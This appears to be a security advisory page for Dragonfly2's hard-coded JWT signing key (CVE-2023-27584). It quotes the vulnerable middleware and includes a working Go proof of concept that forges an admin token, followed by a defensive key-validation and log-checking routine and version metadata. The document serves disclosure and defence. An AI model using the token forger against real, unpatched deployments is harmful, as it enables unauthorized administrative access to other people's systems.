Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1ocGM4LTd3cG0tODg5d84AA_sM
Dragonfly2 has hard coded cryptographic key
Summary
Hello dragonfly maintainer team, I would like to report a security issue concerning your JWT feature.
Details
Dragonfly uses JWT to authenticate users. However, the JWT signing key, "Secret Key", is hard coded in the source, so anyone who knows it can forge a valid token and bypass authentication. The vulnerable middleware configuration:
authMiddleware, err := jwt.New(&jwt.GinJWTMiddleware{
	Realm:       "Dragonfly",
	Key:         []byte("Secret Key"), // hard-coded HMAC signing key, identical in every deployment
	Timeout:     2 * 24 * time.Hour,
	MaxRefresh:  2 * 24 * time.Hour,
	IdentityKey: identityKey,
	IdentityHandler: func(c *gin.Context) any {
		// The user id is taken straight from the token's claims; with a known
		// key, the claims are attacker controlled.
		claims := jwt.ExtractClaims(c)
		id, ok := claims[identityKey]
		if !ok {
			c.JSON(http.StatusUnauthorized, gin.H{
				"message": "Unavailable token: require user id",
			})
			c.Abort()
			return nil
		}
		c.Set("id", id)
		return id
	},
})
PoC
Use the code below to generate a JWT signed with the hard-coded key:
package main

import (
	"errors"
	"fmt"
	"time"

	"github.com/golang-jwt/jwt/v4"
)

// DragonflyTokenClaims mirrors the claims the Dragonfly middleware expects.
type DragonflyTokenClaims struct {
	Id        int32 `json:"id,omitempty"`
	ExpiresAt int64 `json:"exp,omitempty"`
	Issue     int64 `json:"orig_iat,omitempty"`
}

// Valid implements jwt.Claims; it only checks that the token has not expired.
func (stc *DragonflyTokenClaims) Valid() error {
	if stc.ExpiresAt <= time.Now().UTC().Unix() {
		vErr := new(jwt.ValidationError)
		vErr.Inner = errors.New("Token is expired")
		vErr.Errors |= jwt.ValidationErrorExpired
		return vErr
	}
	return nil
}

func main() {
	// The same literal that is hard coded in the server.
	signingKey := "Secret Key"
	token := jwt.NewWithClaims(jwt.SigningMethodHS256, &DragonflyTokenClaims{
		ExpiresAt: time.Now().Add(time.Hour).Unix(),
		Id:        1,
		Issue:     time.Now().Unix(),
	})
	signedToken, err := token.SignedString([]byte(signingKey))
	if err != nil {
		panic(err)
	}
	fmt.Println(signedToken)
}
Send a request carrying the JWT above and you can read data without any restriction.
Impact
An attacker can perform any action as a user with admin privileges.
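A hardened key-loading check and a verification routine a defender can run over logged tokens, as an added example in Go using only the standard library; it is not Dragonfly2's actual fix (see the linked commit) and the function names, the 32-byte minimum and the fixture claims are assumptions.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"strings"
)

const hardCodedDefault = "Secret Key" // literal from the vulnerable code; public, never acceptable
const minKeyBytes = 32                // RFC 7518 section 3.2: HS256 keys must be at least 256 bits

// LoadJWTKey validates a signing key read from configuration or the environment so a
// misconfigured deployment fails closed instead of running with an empty, short or known key.
func LoadJWTKey(raw string) ([]byte, error) {
	switch {
	case raw == "":
		return nil, errors.New("jwt signing key is not configured")
	case raw == hardCodedDefault:
		return nil, errors.New("jwt signing key is the well-known default; refusing to start")
	case len(raw) < minKeyBytes:
		return nil, errors.New("jwt signing key is shorter than 32 bytes")
	}
	return []byte(raw), nil
}
// hs256 computes HMAC-SHA256 over the JWT signing input (header "." payload).
func hs256(signingInput string, key []byte) []byte {
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(signingInput))
	return mac.Sum(nil)
}

// SignedWithKey reports whether a compact JWT's signature verifies under key. Run over
// tokens from access logs with hardCodedDefault, it shows whether forged tokens were accepted.
func SignedWithKey(token string, key []byte) bool {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return false
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	return err == nil && hmac.Equal(hs256(parts[0]+"."+parts[1], key), sig)
}

// HS256Token builds a compact JWT from a claims JSON string (used only to construct fixtures).
func HS256Token(claimsJSON string, key []byte) string {
	enc := base64.RawURLEncoding.EncodeToString
	input := enc([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + enc([]byte(claimsJSON))
	return input + "." + enc(hs256(input, key))
}
```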
Permalink: https://github.com/advisories/GHSA-hpc8-7wpm-889w
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocGM4LTd3cG0tODg5d84AA_sM
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 24 days ago
Updated: 18 days ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-hpc8-7wpm-889w, CVE-2023-27584
References:
- https://github.com/dragonflyoss/Dragonfly2/security/advisories/GHSA-hpc8-7wpm-889w
- https://github.com/dragonflyoss/Dragonfly2/commit/e9da69dc4048bf2a18a671be94616d85e3429433
- https://nvd.nist.gov/vuln/detail/CVE-2023-27584
- https://github.com/dragonflyoss/Dragonfly2/releases/tag/v2.0.9
- https://github.com/advisories/GHSA-hpc8-7wpm-889w
Blast Radius: 3.0
Affected Packages
go:d7y.io/dragonfly/v2
Dependent packages: 2
Dependent repositories: 2
Downloads:
Affected Version Ranges: < 2.1.0-beta.1
Fixed in: 2.1.0-beta.1
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.30, 2.1.0-alpha.0, 2.1.0-alpha.1, 2.1.0-alpha.2, 2.1.0-alpha.3, 2.1.0-alpha.4, 2.1.0-alpha.5, 2.1.0-alpha.6, 2.1.0-alpha.7, 2.1.0-alpha.8, 2.1.0-alpha.9, 2.1.0-beta.0
All unaffected versions: 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6, 2.1.7, 2.1.8, 2.1.9, 2.1.10, 2.1.11, 2.1.12, 2.1.13, 2.1.14, 2.1.15, 2.1.16, 2.1.17, 2.1.18, 2.1.19, 2.1.20, 2.1.21, 2.1.22, 2.1.23, 2.1.24, 2.1.25, 2.1.26, 2.1.27, 2.1.28, 2.1.29, 2.1.30, 2.1.31, 2.1.32, 2.1.33, 2.1.34, 2.1.35, 2.1.36, 2.1.37, 2.1.38, 2.1.39, 2.1.40, 2.1.41, 2.1.42, 2.1.43, 2.1.44, 2.1.45, 2.1.46, 2.1.47, 2.1.48, 2.1.49, 2.1.50, 2.1.51, 2.1.52, 2.1.53, 2.1.54, 2.1.55, 2.1.56, 2.1.57, 2.1.58, 2.1.59